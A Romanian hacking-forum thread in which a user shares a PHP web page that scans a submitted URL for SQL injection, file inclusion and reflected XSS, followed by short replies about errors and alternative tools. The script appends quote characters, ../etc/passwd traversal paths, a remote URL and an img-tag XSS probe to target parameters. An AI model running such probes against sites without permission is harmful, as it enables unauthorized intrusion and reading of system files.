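cosminkent Posted March 10, 2014 Report Posted March 10, 2014
<?php
// Each submission triggers roughly ten outbound requests (one per probe
// string), so the default execution time limit is lifted. Every request is
// bounded by the cURL timeouts set in Vulnscanner::getcontents().
set_time_limit(0);
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
    <title>Fara titlu de prezentare </title>
    <style type="text/css">
        body {
            color: #ffffff;
            text-shadow: 2px 2px #000000;
            background-color: #282828;
            font-family: Arial, Helvetica, sans-serif;
        }
        pre {
            background-color: #353535;
            border: solid 1px #505050;
        }
        input {
            font-family: Arial, Helvetica, sans-serif;
        }
        .Button {
            padding: 5px 10px;
            background: #303030;
            border: solid #101010 1px;
            color: #fff;
            cursor: pointer;
            font-weight: bold;
            border-radius: 5px;
            -moz-border-radius: 5px;
            -webkit-border-radius: 5px;
            text-shadow: 1px 1px #000;
        }
        .Input {
            border: solid #101010 1px;
            color: white;
            font-weight: bold;
            padding: 3px;
            background-color: #252525;
        }
    </style>
</head>
<body>
<div align="center">
<pre><img src="http://i.imgur.com/oTFJi.jpg" width="280" height="125" title="RST" alt="RSTFORUMS" /></pre>
    <form method="POST" action="">
        Adauga url :
        <input type="text" name="url" value="<?php
            // Echo the submitted URL back into the field. It is attacker-controlled
            // text placed inside a quoted attribute, so quotes are escaped explicitly
            // instead of relying on the version-dependent htmlentities() defaults.
            // A non-string value (e.g. "url[]=x") is ignored.
            if (isset($_POST['url']) && is_string($_POST['url'])) {
                echo htmlentities($_POST['url'], ENT_QUOTES, 'UTF-8');
            }
        ?>" placeholder="http://example.com/index.php?id=1'" size="75" class="Input" />
        <input type="submit" name="submit" value="Scanare" class="Button" />
    </form>
    <br />
<?php
##RST ##FORUMS

/**
 * Heuristic single-URL probe for SQL injection, RFI, LFI and reflected XSS.
 *
 * Each check appends a fixed list of strings to the submitted URL, fetches the
 * result server-side with cURL and looks for a fixed list of marker substrings
 * in the response body. A verdict is echoed as HTML; nothing is returned.
 *
 * Limits a reader should keep in mind when interpreting the output:
 *  - The verdicts are plain substring matches, so both false positives and
 *    false negatives are expected.
 *  - NOTE(review): several marker strings are Romanian sentences that look
 *    like translations rather than text a server would emit verbatim, and the
 *    RFI marker depends on the current title of a third-party page; confirm
 *    they still match anything before trusting a negative result.
 *  - The page makes the server fetch a URL chosen by whoever submits the form.
 *    isvalid() and getcontents() restrict this to http/https, but the
 *    destination host is not restricted; where that matters it has to be
 *    enforced outside this script (access control on the page, egress rules).
 */
class Vulnscanner
{
    // Strings appended to the URL, one request per entry.
    private $sql = array("'", '"');
    private $rfi = array("http://www.facebook.com");
    private $lfi = array(
        "../etc/passwd",
        "../../etc/passwd",
        "../../../etc/passwd",
        "../../../../etc/passwd",
        "../../../../../etc/passwd",
        "../../../../../../etc/passwd",
    );
    private $xss = array("'\"/><img src=\"http://rstforums.com\"/>");

    // Response substrings that the matching check treats as a positive result.
    private $sqlerrors = array(
        "mysql_",
        "A aparut o eroare in sintaxa SQL",
        "SQL Error",
        "Eroare baza de date",
        "Eroare MySQL",
    );
    private $rfierrors = array("Bun venit pe Facebook - Inregistreaza-te sau Logheaza-te");
    private $lfierrors = array(
        "root:x:0:0:root:",
        "EROARE: Nu exista fisierul sau directorul specificat",
    );
    private $xsserrors = array("<img src=\"http://rstforums.com\"/>");

    /**
     * Decide whether a submitted value may be fetched by this page.
     *
     * FILTER_VALIDATE_URL alone also accepts schemes such as file:// or ftp://,
     * which would let a form submission point the server-side fetch at local
     * files or non-web services. Only http and https are accepted here.
     *
     * @param mixed $link Submitted value.
     * @return bool True for an http(s) URL that contains at least one "=".
     */
    public function isvalid($link)
    {
        if (!is_string($link) || filter_var($link, FILTER_VALIDATE_URL) === false) {
            return false;
        }

        $scheme = strtolower((string) parse_url($link, PHP_URL_SCHEME));
        if ($scheme !== 'http' && $scheme !== 'https') {
            return false;
        }

        // The checks rewrite the text after the first "=", so one must exist.
        return strpos($link, '=') !== false;
    }

    /**
     * Fetch a URL and return its body.
     *
     * @param string $link URL to request.
     * @return string Response body, or '' when the request failed.
     */
    private function getcontents($link)
    {
        $agent = 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:17.0) Gecko/20100101 Firefox/17.0';

        $ch = curl_init();
        if ($ch === false) {
            return '';
        }

        curl_setopt($ch, CURLOPT_URL, $link);
        curl_setopt($ch, CURLOPT_USERAGENT, $agent);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        // Second line of defence behind isvalid(): cURL itself refuses any
        // protocol other than HTTP(S). Redirects are not followed (the default).
        curl_setopt($ch, CURLOPT_PROTOCOLS, CURLPROTO_HTTP | CURLPROTO_HTTPS);
        // Certificate checks stay on: the verdict is derived from the response
        // body, so a response altered in transit would alter the verdict.
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, true);
        curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 2);
        // set_time_limit(0) removes PHP's own limit, so bound each request here.
        curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10);
        curl_setopt($ch, CURLOPT_TIMEOUT, 30);

        $result = curl_exec($ch);

        // Before PHP 8 the handle is a resource that must be released explicitly.
        if (PHP_VERSION_ID < 80000) {
            curl_close($ch);
        }

        // curl_exec() returns false on failure; normalise that to an empty body.
        return is_string($result) ? $result : '';
    }

    /**
     * Request $url with each suffix appended and look for any marker string.
     *
     * @param string   $url      Base URL the suffixes are appended to.
     * @param string[] $addtourl Suffixes, one request each.
     * @param string[] $errorar  Marker substrings searched for in each body.
     * @return bool True as soon as one response contains one marker.
     */
    private function errorcheck($url, $addtourl, $errorar)
    {
        foreach ($addtourl as $suffix) {
            $body = $this->getcontents($url . $suffix);
            if ($body === '') {
                continue; // failed request or empty page: nothing to match
            }
            foreach ($errorar as $marker) {
                if (strpos($body, $marker) !== false) {
                    return true;
                }
            }
        }

        return false;
    }

    /**
     * Return the URL cut off right after its first "=", or the URL unchanged
     * when it has none (the original arithmetic on a failed strpos() would
     * have kept only the first character).
     *
     * @param string $link Submitted URL.
     * @return string
     */
    private function uptofirstvalue($link)
    {
        $pos = strpos($link, '=');

        return $pos === false ? $link : substr($link, 0, $pos + 1);
    }

    /**
     * Echo the verdict line for one check.
     *
     * @param string $orig       URL as submitted; escaped before output.
     * @param bool   $vulnerable Result of errorcheck().
     * @param string $label      Name of the check shown in the message.
     * @return void
     */
    private function report($orig, $vulnerable, $label)
    {
        $shown = htmlentities($orig, ENT_QUOTES, 'UTF-8');

        if ($vulnerable) {
            echo $shown . " Site-ul <span style=\"color: green;\">ESTE</span> vulnerabil " . $label . ".<br />";
        } else {
            echo $shown . " Probabil <span style=\"color: red;\">NU</span> este vulnerabil " . $label . ".<br />";
        }
    }

    /**
     * SQL injection check: appends the quote characters to the full URL.
     *
     * @param string $link Submitted URL.
     * @return void Echoes the verdict.
     */
    public function issqlvulnerable($link)
    {
        $this->report($link, $this->errorcheck($link, $this->sql, $this->sqlerrors), "SQL Injection");
    }

    /**
     * RFI check: replaces everything after the first "=" with the remote URL.
     *
     * @param string $link Submitted URL.
     * @return void Echoes the verdict.
     */
    public function isrfivulnerable($link)
    {
        $base = $this->uptofirstvalue($link);
        $this->report($link, $this->errorcheck($base, $this->rfi, $this->rfierrors), "RFI");
    }

    /**
     * LFI check: replaces everything after the first "=" with each relative path.
     *
     * @param string $link Submitted URL.
     * @return void Echoes the verdict.
     */
    public function islfivulnerable($link)
    {
        $base = $this->uptofirstvalue($link);
        $this->report($link, $this->errorcheck($base, $this->lfi, $this->lfierrors), "LFI");
    }

    /**
     * XSS check: replaces everything after the first "=" with the marker tag
     * and reports a hit when the tag comes back unescaped.
     *
     * @param string $link Submitted URL.
     * @return void Echoes the verdict.
     */
    public function isxssvulnerable($link)
    {
        $base = $this->uptofirstvalue($link);
        $this->report($link, $this->errorcheck($base, $this->xss, $this->xsserrors), "XSS");
    }
} // END OF CLASS

// Run the checks only for a submitted form. PHP turns "url[]=..." into an
// array, which the string functions cannot take, so anything that is not a
// string is treated as an empty (and therefore invalid) link.
if (isset($_POST['url']) && isset($_POST['submit'])) {
    $obj = new Vulnscanner();
    $link = is_string($_POST['url']) ? $_POST['url'] : '';

    if ($obj->isvalid($link)) {
        $obj->islfivulnerable($link);
        $obj->isxssvulnerable($link);
        $obj->issqlvulnerable($link);
        $obj->isrfivulnerable($link);
    } else {
        echo "<span style=\"color: red;\">" . htmlentities($link, ENT_QUOTES, 'UTF-8') . " nu este un link valid.</span>";
    }
}
?>
<br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br />
<a href="http://rstforums.com"><span style="color: red;">RSTFORUMS.COM</span></a>
</div>
</body>
</html>
Source: HC
Poate va este de folos Quote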
sniperspy Posted March 10, 2014 Report Posted March 10, 2014 imi scrie Warning: set_time_limit() has been disabled for security reasons in /home/a5940441/public_html/sniperspy.html on line 2 ce sa fac? Quote
123a Posted May 8, 2015 Report Posted May 8, 2015 si daca un site are redirect si imi da ca acest link nu e bun...cum pot gasi adevaratul redirect.....MS, Quote
blech Posted May 8, 2015 Report Posted May 8, 2015 @123a are mai mult de un an vechime acest thread.iti recomand cu caldura sa deschizi un nou topic la ajutor si sa oferi cat mai multe detalii despre problema ta. Quote
anoxdox Posted May 10, 2015 Report Posted May 10, 2015 Programul asta e destul de vechi; folositi OWASP, e unul foarte bun de gasit vulnerabilitati, sau mai are Kali Linux inca o gramada de programe pentru astfel de vulnerabilitati. Quote